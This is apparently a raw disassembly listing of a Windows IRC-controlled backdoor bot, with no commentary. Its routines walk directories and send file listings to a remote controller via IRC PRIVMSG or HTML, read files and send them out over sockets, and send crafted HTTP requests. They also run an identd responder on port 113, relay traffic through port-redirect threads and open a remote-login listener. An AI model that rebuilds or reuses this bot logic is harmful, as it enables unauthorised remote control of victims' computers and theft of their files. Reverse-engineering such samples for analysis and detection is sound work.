loc_40FDDF: ; CODE XREF: sub_40F96B+577j lea eax, [ebp+var_248] push eax call sub_41B980 add esp, 1Ch jmp loc_40FF0D ; --------------------------------------------------------------------------- loc_40FDF3: ; CODE XREF: sub_40F96B+44Fj cmp [ebp+arg_C], ebx jz loc_40FEE7 push 0E6h push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\"" lea eax, [ebp+var_248] push edi push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send lea eax, [ebp+var_35C] push eax lea eax, [ebp+var_248] push [ebp+arg_C] push offset dword_429AD0 push edi push eax call sub_41B980 add esp, 14h lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send lea eax, [ebp+var_35C] push eax call sub_41AFE0 cmp eax, 1Fh pop ecx lea eax, [ebp+var_35C] push eax jbe short loc_40FE93 push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>" jmp short loc_40FE98 ; --------------------------------------------------------------------------- loc_40FE93: ; CODE XREF: sub_40F96B+51Fj push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>" loc_40FE98: ; CODE XREF: sub_40F96B+526j lea eax, [ebp+var_248] push edi push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send mov eax, [ebp+var_368] shr eax, 0Ah push eax lea eax, [ebp+var_48] push 3Ch push eax push 96h push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"... push edi jmp loc_40FDDF ; --------------------------------------------------------------------------- loc_40FEE7: ; CODE XREF: sub_40F96B+48Bj push [ebp+var_368] lea eax, [ebp+var_48] push eax lea eax, [ebp+var_35C] push eax push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n" loc_40FEFD: ; CODE XREF: sub_40F96B+315j push esi loc_40FEFE: ; CODE XREF: sub_40F96B+3FFj lea eax, [ebp+var_248] push eax call sub_41B980 add esp, 18h loc_40FF0D: ; CODE XREF: sub_40F96B+444j ; sub_40F96B+483j lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send cmp [ebp+arg_8], ebx jz short loc_40FF3C push 7D0h call dword_427078 ; Sleep loc_40FF3C: ; CODE XREF: sub_40F96B+22Bj ; sub_40F96B+246j ... lea eax, [ebp+var_388] push eax push [ebp+arg_0] call dword_427118 ; FindNextFileA test eax, eax jnz loc_40FB90 loc_40FF54: ; CODE XREF: sub_40F96B+21Aj push [ebp+arg_0] call dword_42710C ; FindClose cmp [ebp+arg_8], ebx jz short loc_40FF97 mov eax, [ebp+var_8] cdq push edx push eax call sub_416923 pop ecx pop ecx push eax mov eax, [ebp+var_4] cdq push edx push eax call sub_416923 pop ecx pop ecx push eax lea eax, [ebp+var_248] push [ebp+arg_8] push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"... push eax call sub_41B886 add esp, 14h jmp short loc_40FFCB ; --------------------------------------------------------------------------- loc_40FF97: ; CODE XREF: sub_40F96B+5F5j cmp [ebp+arg_C], ebx jz short loc_40FFB1 lea eax, [ebp+var_248] push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"... push eax call sub_41B886 pop ecx pop ecx jmp short loc_40FFCB ; --------------------------------------------------------------------------- loc_40FFB1: ; CODE XREF: sub_40F96B+62Fj push [ebp+var_8] lea eax, [ebp+var_248] push [ebp+var_4] push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n" push eax call sub_41B886 add esp, 10h loc_40FFCB: ; CODE XREF: sub_40F96B+62Aj ; sub_40F96B+644j lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send pop edi pop esi xor eax, eax pop ebx leave retn sub_40F96B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40FFF1 proc near ; CODE XREF: sub_40F531+13Cp var_404 = byte ptr -404h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 404h push ebx push esi xor esi, esi push edi push esi push esi push 3 push esi push 1 push 80000000h push [ebp+arg_4] mov edi, 400h mov [ebp+var_4], esi call dword_4270EC ; CreateFileA mov ebx, eax cmp ebx, 0FFFFFFFFh jz loc_4100A9 push esi push ebx call dword_427108 ; GetFileSize cmp eax, esi mov [ebp+arg_4], eax jz short loc_4100A2 loc_410036: ; CODE XREF: sub_40FFF1+AFj push 400h lea eax, [ebp+var_404] push esi push eax call sub_41B590 add esp, 0Ch cmp edi, [ebp+arg_4] jbe short loc_410053 mov edi, [ebp+arg_4] loc_410053: ; CODE XREF: sub_40FFF1+5Dj mov eax, [ebp+arg_4] push 2 neg eax push esi push eax push ebx call dword_42711C ; SetFilePointer lea eax, [ebp+var_4] push esi push eax lea eax, [ebp+var_404] push edi push eax push ebx call dword_4270E8 ; ReadFile push esi lea eax, [ebp+var_404] push edi push eax push [ebp+arg_0] call ds:dword_4CB6A4 ; send cmp eax, 0FFFFFFFFh jnz short loc_41009D call ds:dword_4CB5E8 ; WSAGetLastError cmp eax, 2733h jnz short loc_4100A2 xor eax, eax loc_41009D: ; CODE XREF: sub_40FFF1+9Bj sub [ebp+arg_4], eax jnz short loc_410036 loc_4100A2: ; CODE XREF: sub_40FFF1+43j ; sub_40FFF1+A8j push ebx call dword_427068 ; CloseHandle loc_4100A9: ; CODE XREF: sub_40FFF1+30j pop edi pop esi pop ebx leave retn sub_40FFF1 endp ; =============== S U B R O U T I N E ======================================= sub_4100AE proc near ; CODE XREF: sub_40F6B4+181p arg_0 = dword ptr 4 push esi push edi mov edi, [esp+8+arg_0] xor esi, esi push edi call sub_41AFE0 test eax, eax pop ecx jbe short loc_4100D7 loc_4100C1: ; CODE XREF: sub_4100AE+27j cmp byte ptr [esi+edi], 5Ch jnz short loc_4100CB mov byte ptr [esi+edi], 2Fh loc_4100CB: ; CODE XREF: sub_4100AE+17j push edi inc esi call sub_41AFE0 cmp esi, eax pop ecx jb short loc_4100C1 loc_4100D7: ; CODE XREF: sub_4100AE+11j mov eax, edi pop edi pop esi retn sub_4100AE endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4100DC proc near ; CODE XREF: sub_401ACD+5298p var_4A0 = byte ptr -4A0h var_310 = byte ptr -310h var_110 = byte ptr -110h var_10 = word ptr -10h var_E = word ptr -0Eh var_C = dword ptr -0Ch arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h arg_1C = dword ptr 24h arg_20 = dword ptr 28h push ebp mov ebp, esp sub esp, 4A0h push ebx lea eax, [ebp+var_4A0] push edi push eax push 101h call ds:dword_4CB5C4 ; WSAStartup push 6 push 1 push 2 call ds:dword_4CB6D4 ; socket mov ebx, eax xor edi, edi push 10h lea eax, [ebp+var_10] push edi push eax call sub_41B590 add esp, 0Ch mov [ebp+var_10], 2 push [ebp+arg_14] call ds:dword_4CB654 ; htons push [ebp+arg_10] mov [ebp+var_E], ax call sub_40AAFA pop ecx mov [ebp+var_C], eax lea eax, [ebp+var_10] push 10h push eax push ebx call ds:dword_4CB5FC ; connect cmp eax, 0FFFFFFFFh jz short loc_4101B9 mov eax, [ebp+arg_20] cmp eax, edi jnz short loc_410155 mov eax, offset byte_43D808 loc_410155: ; CODE XREF: sub_4100DC+72j push esi mov esi, 100h push [ebp+arg_10] push eax lea eax, [ebp+var_110] push [ebp+arg_1C] push [ebp+arg_18] push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"... push esi push eax call sub_41B980 add esp, 1Ch lea eax, [ebp+var_110] push edi push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_110] push eax push ebx call ds:dword_4CB6A4 ; send push esi lea eax, [ebp+var_110] push edi push eax call sub_41C310 add esp, 0Ch lea eax, [ebp+var_110] push edi push esi push eax push ebx call ds:dword_4CB66C ; recv pop esi loc_4101B9: ; CODE XREF: sub_4100DC+6Bj push ebx call ds:dword_4CB6EC ; closesocket call ds:dword_4CB5AC ; WSACleanup lea eax, [ebp+var_110] push eax lea eax, [ebp+var_310] push eax call sub_41B886 cmp [ebp+arg_C], edi pop ecx pop ecx jnz short loc_4101F9 push edi lea eax, [ebp+var_310] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_4101F9: ; CODE XREF: sub_4100DC+102j pop edi pop ebx leave retn sub_4100DC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4101FD proc near ; DATA XREF: sub_401221+445o ; sub_401ACD+436Ao var_238 = byte ptr -238h var_38 = byte ptr -38h var_2C = byte ptr -2Ch var_2A = word ptr -2Ah var_28 = dword ptr -28h var_1C = word ptr -1Ch var_1A = word ptr -1Ah var_18 = dword ptr -18h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 238h push ebx push esi push edi push 10h pop edi xor esi, esi push edi lea eax, [ebp+var_1C] push esi push eax mov [ebp+var_8], esi call sub_41B590 add esp, 0Ch mov [ebp+var_1C], 2 push 71h call ds:dword_4CB654 ; htons push esi push 1 push 2 mov [ebp+var_1A], ax mov [ebp+var_18], esi call ds:dword_4CB6D4 ; socket mov ebx, eax cmp ebx, 0FFFFFFFFh jz loc_410361 mov eax, [ebp+arg_0] push edi imul eax, 234h mov dword_43E59C[eax], ebx lea eax, [ebp+var_1C] push eax push ebx call ds:dword_4CB680 ; bind cmp eax, 0FFFFFFFFh jz loc_410361 push 5 push ebx call ds:dword_4CB67C ; listen cmp eax, 0FFFFFFFFh jz loc_410361 mov [ebp+var_C], edi mov edi, 200h loc_410288: ; CODE XREF: sub_4101FD+EAj ; sub_4101FD+14Dj ... lea eax, [ebp+var_C] push eax lea eax, [ebp+var_2C] push eax push ebx call ds:dword_4CB6E8 ; accept cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jz loc_41035C movzx eax, [ebp+var_2A] push eax push [ebp+var_28] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_238] push offset dword_43468C push eax call sub_41B886 lea eax, [ebp+var_238] push eax call sub_4151AD add esp, 14h lea eax, [ebp+var_238] push esi push edi push eax push [ebp+var_4] call ds:dword_4CB66C ; recv cmp eax, 0FFFFFFFFh jz short loc_410288 lea eax, [ebp+var_238] push esi push eax call sub_417F80 push 0Ch lea eax, [ebp+var_38] push esi push eax call sub_41B590 push esi push esi lea eax, [ebp+var_38] push 2 push eax call sub_40B08E add esp, 24h push eax push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n" lea eax, [ebp+var_238] push edi push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_238] push esi push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_238] push eax push [ebp+var_4] call ds:dword_4CB6A4 ; send cmp eax, 0FFFFFFFFh jz loc_410288 mov [ebp+var_8], 1 jmp loc_410288 ; --------------------------------------------------------------------------- loc_41035C: ; CODE XREF: sub_4101FD+A0j cmp [ebp+var_8], esi jnz short loc_410388 loc_410361: ; CODE XREF: sub_4101FD+47j ; sub_4101FD+6Bj ... call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_238] push offset dword_434648 push eax call sub_41B886 lea eax, [ebp+var_238] push eax call sub_4151AD add esp, 10h loc_410388: ; CODE XREF: sub_4101FD+162j push ebx call ds:dword_4CB6EC ; closesocket push [ebp+var_4] call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call sub_40B413 pop ecx push esi call dword_4270CC ; ExitThread pop edi pop esi pop ebx sub_4101FD endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4103AB proc near ; DATA XREF: sub_401ACD+613Co var_350 = byte ptr -350h var_150 = byte ptr -150h var_14C = dword ptr -14Ch var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_30 = dword ptr -30h var_28 = byte ptr -28h var_26 = word ptr -26h var_24 = dword ptr -24h var_18 = byte ptr -18h var_14 = word ptr -14h var_12 = word ptr -12h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 350h mov eax, [ebp+arg_0] push esi push edi push 4Ah pop ecx mov esi, eax lea edi, [ebp+var_150] push 10h rep movsd pop edi mov dword ptr [eax+120h], 1 xor esi, esi push edi lea eax, [ebp+var_14] push esi push eax call sub_41B590 add esp, 0Ch mov [ebp+var_14], 2 push [ebp+var_44] call ds:dword_4CB654 ; htons push 6 push 1 push 2 mov [ebp+var_12], ax mov [ebp+var_10], esi mov [ebp+var_4], edi call ds:dword_4CB6D4 ; socket cmp eax, 0FFFFFFFFh mov [ebp+arg_0], eax jz loc_410517 mov ecx, [ebp+var_40] push 1 imul ecx, 234h push 401h push esi push eax mov dword_43E59C[ecx], eax call ds:dword_4CB564 ; WSAAsyncSelect lea eax, [ebp+var_14] push edi push eax push [ebp+arg_0] call ds:dword_4CB680 ; bind test eax, eax jnz loc_410517 push 0Ah push [ebp+arg_0] call ds:dword_4CB67C ; listen test eax, eax jnz loc_410517 loc_41045B: ; CODE XREF: sub_4103AB+C6j ; sub_4103AB+147j lea eax, [ebp+var_4] push eax lea eax, [ebp+var_28] push eax push [ebp+arg_0] call ds:dword_4CB6E8 ; accept mov edi, eax cmp edi, 0FFFFFFFFh jz short loc_41045B movzx eax, [ebp+var_26] push [ebp+var_40] mov [ebp+var_14C], edi mov [ebp+var_30], esi push eax push [ebp+var_24] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_350] push offset unk_4346F4 push eax call sub_41B886 push edi lea eax, [ebp+var_350] push 18h push eax call sub_40B0F7 mov [ebp+var_3C], eax imul eax, 234h mov ecx, [ebp+var_40] add esp, 20h mov dword_43E594[eax], ecx lea eax, [ebp+var_18] push eax lea eax, [ebp+var_150] push esi push eax push offset sub_41053C push esi push esi call dword_42707C ; CreateThread mov ecx, [ebp+var_3C] imul ecx, 234h cmp eax, esi mov dword_43E5A4[ecx], eax jz short loc_410502 loc_4104EF: ; CODE XREF: sub_4103AB+155j cmp [ebp+var_30], esi jnz loc_41045B push 32h call dword_427078 ; Sleep jmp short loc_4104EF ; --------------------------------------------------------------------------- loc_410502: ; CODE XREF: sub_4103AB+142j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_4346B8 call sub_415221 pop ecx pop ecx jmp short loc_41051A ; --------------------------------------------------------------------------- loc_410517: ; CODE XREF: sub_4103AB+63j ; sub_4103AB+97j ... mov edi, [ebp+arg_0] loc_41051A: ; CODE XREF: sub_4103AB+16Aj push edi call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call ds:dword_4CB6EC ; closesocket push [ebp+var_40] call sub_40B413 pop ecx push esi call dword_4270CC ; ExitThread pop edi pop esi sub_4103AB endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41053C proc near ; DATA XREF: sub_4103AB+124o var_1344 = byte ptr -1344h var_344 = byte ptr -344h var_144 = byte ptr -144h var_13C = byte ptr -13Ch var_3C = dword ptr -3Ch var_34 = dword ptr -34h var_30 = dword ptr -30h var_20 = dword ptr -20h var_1C = byte ptr -1Ch var_18 = word ptr -18h var_16 = word ptr -16h var_14 = dword ptr -14h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 1344h call sub_41BB20 mov eax, [ebp+arg_0] push ebx push esi push edi push 4Ah mov esi, eax pop ecx lea edi, [ebp+var_144] rep movsd mov ebx, [ebp+var_30] push 1 pop ecx mov [ebp+var_4], ebx push 6 push ecx push 2 mov [eax+120h], ecx call ds:dword_4CB6D4 ; socket mov esi, eax xor edi, edi cmp esi, 0FFFFFFFFh mov [ebp+arg_0], esi jz loc_4106F2 push 10h lea eax, [ebp+var_18] push edi push eax call sub_41B590 add esp, 0Ch mov [ebp+var_18], 2 push [ebp+var_3C] call ds:dword_4CB654 ; htons mov [ebp+var_16], ax lea eax, [ebp+var_13C] push eax call ds:dword_4CB694 ; inet_addr cmp eax, 0FFFFFFFFh mov [ebp+var_8], eax jnz short loc_4105CC lea eax, [ebp+var_13C] push eax call ds:dword_4CB6D8 ; gethostbyname jmp short loc_4105DA ; --------------------------------------------------------------------------- loc_4105CC: ; CODE XREF: sub_41053C+7Fj push 2 lea eax, [ebp+var_8] push 4 push eax call ds:dword_4CB60C ; gethostbyaddr loc_4105DA: ; CODE XREF: sub_41053C+8Ej cmp eax, edi jz loc_4106F2 mov eax, [eax+0Ch] push 10h mov eax, [eax] mov eax, [eax] mov [ebp+var_14], eax lea eax, [ebp+var_18] push eax push esi call ds:dword_4CB5FC ; connect cmp eax, 0FFFFFFFFh jz loc_4106F2 movzx eax, [ebp+var_16] push [ebp+var_34] mov [ebp+var_20], edi push eax push [ebp+var_14] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_344] push offset unk_43477C push eax call sub_41B886 push esi lea eax, [ebp+var_344] push 18h push eax call sub_40B0F7 imul ebx, 234h mov [ebp+var_30], eax imul eax, 234h mov ecx, [ebp+var_34] lea esi, dword_43E59C[ebx] mov dword_43E594[eax], ecx add esp, 20h mov ecx, [esi] mov dword_43E5A0[eax], ecx lea eax, [ebp+var_1C] push eax lea eax, [ebp+var_144] push edi push eax push offset sub_410723 push edi push edi call dword_42707C ; CreateThread mov ecx, [ebp+var_30] imul ecx, 234h cmp eax, edi mov dword_43E5A4[ecx], eax jz short loc_4106DF loc_41068C: ; CODE XREF: sub_41053C+15Dj cmp [ebp+var_20], edi jnz short loc_41069B push 32h call dword_427078 ; Sleep jmp short loc_41068C ; --------------------------------------------------------------------------- loc_41069B: ; CODE XREF: sub_41053C+153j mov ebx, 1000h loc_4106A0: ; CODE XREF: sub_41053C+19Fj push ebx lea eax, [ebp+var_1344] push edi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_1344] push edi push ebx push eax push dword ptr [esi] call ds:dword_4CB66C ; recv cmp eax, edi jle short loc_4106F2 push edi push eax lea eax, [ebp+var_1344] push eax push [ebp+arg_0] call ds:dword_4CB6A4 ; send cmp eax, 0FFFFFFFFh jnz short loc_4106A0 jmp short loc_4106F2 ; --------------------------------------------------------------------------- loc_4106DF: ; CODE XREF: sub_41053C+14Ej call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_43473C call sub_415221 pop ecx pop ecx loc_4106F2: ; CODE XREF: sub_41053C+44j ; sub_41053C+A0j ... mov eax, [ebp+var_4] imul eax, 234h push dword_43E59C[eax] call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call ds:dword_4CB6EC ; closesocket push [ebp+var_4] call sub_40B413 pop ecx push edi call dword_4270CC ; ExitThread pop edi pop esi pop ebx sub_41053C endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_410723 proc near ; DATA XREF: sub_41053C+130o var_1128 = byte ptr -1128h var_128 = byte ptr -128h var_14 = dword ptr -14h arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 1128h call sub_41BB20 mov eax, [ebp+arg_0] push esi push edi push 4Ah pop ecx mov esi, eax lea edi, [ebp+var_128] rep movsd mov esi, [ebp+var_14] mov dword ptr [eax+124h], 1 imul esi, 234h mov edi, 1000h loc_41075A: ; CODE XREF: sub_410723+7Cj push edi lea eax, [ebp+var_1128] push 0 push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_1128] push 0 push edi push eax push dword_43E5A0[esi] call ds:dword_4CB66C ; recv test eax, eax jle short loc_4107A1 push 0 push eax lea eax, [ebp+var_1128] push eax push dword_43E59C[esi] call ds:dword_4CB6A4 ; send cmp eax, 0FFFFFFFFh jnz short loc_41075A loc_4107A1: ; CODE XREF: sub_410723+61j push dword_43E5A0[esi] call ds:dword_4CB6EC ; closesocket push [ebp+var_14] call sub_40B413 pop ecx push 0 call dword_4270CC ; ExitThread pop edi pop esi sub_410723 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4107C0 proc near ; DATA XREF: sub_410A4E+1BEo var_3D4 = byte ptr -3D4h var_350 = byte ptr -350h var_208 = dword ptr -208h var_1F4 = dword ptr -1F4h var_1F0 = dword ptr -1F0h var_F0 = byte ptr -0F0h var_B0 = byte ptr -0B0h var_4C = byte ptr -4Ch var_3C = byte ptr -3Ch var_2C = byte ptr -2Ch var_1C = byte ptr -1Ch var_18 = dword ptr -18h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 3D4h mov eax, [ebp+arg_0] push ebx push esi push edi push 78h mov esi, eax pop ecx lea edi, [ebp+var_3D4] push 1 mov [ebp+var_C], 1Eh pop ebx rep movsd mov [eax+1DCh], ebx mov eax, [ebp+var_208] mov [ebp+arg_0], eax imul eax, 234h lea esi, dword_43E59C[eax] xor edi, edi mov [ebp+var_8], edi mov [ebp+var_1F4], ebx mov eax, [esi] mov [ebp+var_1F0], eax lea eax, [ebp+var_C] push eax push edi lea eax, [ebp+var_1F4] push edi push eax push edi call ds:dword_4CB63C ; select test eax, eax jnz short loc_410844 push dword ptr [esi] call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call sub_40B413 pop ecx push edi call dword_4270CC ; ExitThread loc_410844: ; CODE XREF: sub_4107C0+6Aj push edi lea eax, [ebp+var_3C] push ebx push eax push dword ptr [esi] call ds:dword_4CB66C ; recv lea eax, [ebp+var_2C] push 10h push eax push dword ptr [esi] call sub_4109C5 lea eax, [ebp+var_4C] push 10h push eax push dword ptr [esi] call sub_4109C5 lea eax, [ebp+var_F0] push 40h push eax push dword ptr [esi] call sub_4109C5 add esp, 24h lea eax, [ebp+var_4] mov [ebp+var_4], 10h push eax lea eax, [ebp+var_1C] push eax push dword ptr [esi] call ds:dword_4CB5A8 ; getpeername test eax, eax jz short loc_4108BD call ds:dword_4CB5E8 ; WSAGetLastError push eax push offset unk_434854 call sub_415221 push [ebp+arg_0] call sub_40B413 add esp, 0Ch push edi call dword_4270CC ; ExitThread loc_4108BD: ; CODE XREF: sub_4107C0+D8j push 2 lea eax, [ebp+var_18] push 4 push eax call ds:dword_4CB60C ; gethostbyaddr cmp eax, edi jnz short loc_4108E7 push [ebp+var_18] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_B0] push eax call sub_41B886 jmp short loc_4108F5 ; --------------------------------------------------------------------------- loc_4108E7: ; CODE XREF: sub_4107C0+10Dj push dword ptr [eax] lea eax, [ebp+var_B0] push eax call sub_41BEB0 loc_4108F5: ; CODE XREF: sub_4107C0+125j pop ecx pop ecx push edi push ebx push offset byte_43D808 push dword ptr [esi] call ds:dword_4CB6A4 ; send cmp ds:dword_4CE3B8, edi jnz short loc_410957 push [ebp+var_18] lea eax, [ebp+var_350] push eax lea eax, [ebp+var_B0] push eax lea eax, [ebp+var_2C] push eax call sub_410A1F add esp, 10h test eax, eax jnz short loc_410957 push edi push 13h push offset aPermissionDeni ; "Permission denied\n" push dword ptr [esi] call ds:dword_4CB6A4 ; send push dword ptr [esi] call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call sub_40B413 pop ecx push edi call dword_4270CC ; ExitThread loc_410957: ; CODE XREF: sub_4107C0+14Cj ; sub_4107C0+16Dj lea eax, [ebp+var_B0] push eax lea eax, [ebp+var_2C] push eax push offset unk_434818 call sub_415221 push [ebp+arg_0] call sub_410CD6 add esp, 10h test eax, eax jnz short loc_41099E call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_4347EC call sub_415221 push [ebp+arg_0] call sub_40B413 add esp, 0Ch push ebx call dword_4270CC ; ExitThread loc_41099E: ; CODE XREF: sub_4107C0+1B9j lea eax, [ebp+var_B0] push eax lea eax, [ebp+var_2C] push eax push offset unk_4347C0 call sub_415221 push [ebp+arg_0] call sub_40B413 add esp, 10h push edi call dword_4270CC ; ExitThread sub_4107C0 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4109C5 proc near ; CODE XREF: sub_4107C0+9Ap ; sub_4107C0+A7p ... var_1 = byte ptr -1 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push ecx push esi push 0 lea eax, [ebp+var_1] push 1 push eax push [ebp+arg_0] call ds:dword_4CB66C ; recv cmp eax, 1 jnz short loc_410A15 mov esi, [ebp+arg_4] loc_4109E3: ; CODE XREF: sub_4109C5+41j mov al, [ebp+var_1] mov [esi], al inc esi dec [ebp+arg_8] jz short loc_410A0A test al, al jz short loc_410A19 push 0 lea eax, [ebp+var_1] push 1 push eax push [ebp+arg_0] call ds:dword_4CB66C ; recv cmp eax, 1 jz short loc_4109E3 jmp short loc_410A15 ; --------------------------------------------------------------------------- loc_410A0A: ; CODE XREF: sub_4109C5+27j push offset unk_434880 call sub_415221 pop ecx loc_410A15: ; CODE XREF: sub_4109C5+19j ; sub_4109C5+43j xor eax, eax jmp short loc_410A1C ; --------------------------------------------------------------------------- loc_410A19: ; CODE XREF: sub_4109C5+2Bj push 1 pop eax loc_410A1C: ; CODE XREF: sub_4109C5+52j pop esi leave retn sub_4109C5 endp ; =============== S U B R O U T I N E ======================================= sub_410A1F proc near ; CODE XREF: sub_4107C0+163p arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push [esp+arg_0] push [esp+4+arg_8] call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_410A4A push [esp+arg_4] push [esp+4+arg_0] push offset unk_4348AC call sub_415221 add esp, 0Ch xor eax, eax retn ; --------------------------------------------------------------------------- loc_410A4A: ; CODE XREF: sub_410A1F+11j push 1 pop eax retn sub_410A1F endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_410A4E proc near ; DATA XREF: sub_401ACD+23D5o var_5DC = dword ptr -5DCh var_5A4 = byte ptr -5A4h var_414 = byte ptr -414h var_214 = dword ptr -214h var_210 = byte ptr -210h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = byte ptr -34h var_32 = word ptr -32h var_30 = dword ptr -30h var_24 = byte ptr -24h var_20 = word ptr -20h var_1E = word ptr -1Eh var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 5A4h mov eax, [ebp+arg_0] push esi push edi push 78h pop ecx mov esi, eax lea edi, [ebp+var_214] push 1 rep movsd pop edi mov [eax+1DCh], edi lea eax, [ebp+var_5A4] push eax push 202h call ds:dword_4CB5C4 ; WSAStartup xor esi, esi cmp eax, esi jz short loc_410AA7 push eax push offset unk_434A1C call sub_415221 push [ebp+var_4C] call sub_40B413 add esp, 0Ch push edi call dword_4270CC ; ExitThread loc_410AA7: ; CODE XREF: sub_410A4E+3Aj push edi push offset loc_410CCC call dword_427120 ; SetConsoleCtrlHandler test eax, eax jnz short loc_410AE0 call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_4349D8 call sub_415221 pop ecx pop ecx call ds:dword_4CB5AC ; WSACleanup push [ebp+var_4C] call sub_40B413 pop ecx push edi call dword_4270CC ; ExitThread loc_410AE0: ; CODE XREF: sub_410A4E+67j push ebx push 10h lea eax, [ebp+var_20] push esi push eax call sub_41B590 add esp, 0Ch mov [ebp+var_20], 2 push [ebp+var_50] call ds:dword_4CB654 ; htons push 6 push edi push 2 mov [ebp+var_1E], ax mov [ebp+var_1C], esi call ds:dword_4CB6D4 ; socket mov ebx, eax cmp ebx, 0FFFFFFFFh jz loc_410C57 mov eax, [ebp+var_4C] push 10h imul eax, 234h mov dword_43E59C[eax], ebx lea eax, [ebp+var_20] push eax push ebx call ds:dword_4CB680 ; bind test eax, eax jnz loc_410C57 push 7FFFFFFFh push ebx call ds:dword_4CB67C ; listen test eax, eax jnz loc_410C57 push offset unk_43499C mov [ebp+var_10], 0Ch mov [ebp+var_C], esi mov [ebp+var_8], esi call sub_4151AD pop ecx mov [ebp+arg_0], edi loc_410B6F: ; CODE XREF: sub_410A4E+15Aj ; sub_410A4E+1E4j lea eax, [ebp+var_4] mov [ebp+var_4], 10h push eax lea eax, [ebp+var_34] push eax push ebx call ds:dword_4CB6E8 ; accept mov edi, eax cmp edi, 0FFFFFFFFh jz loc_410C5A push [ebp+arg_0] lea eax, [ebp+arg_0] push eax push 8 push 0FFFFh push edi call ds:dword_4CB634 ; setsockopt cmp eax, 0FFFFFFFFh jz short loc_410B6F movzx eax, [ebp+var_32] push [ebp+var_4C] mov [ebp+var_38], esi push eax push [ebp+var_30] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_414] push offset unk_434958 push eax call sub_41B886 lea eax, [ebp+var_414] push eax call sub_4151AD 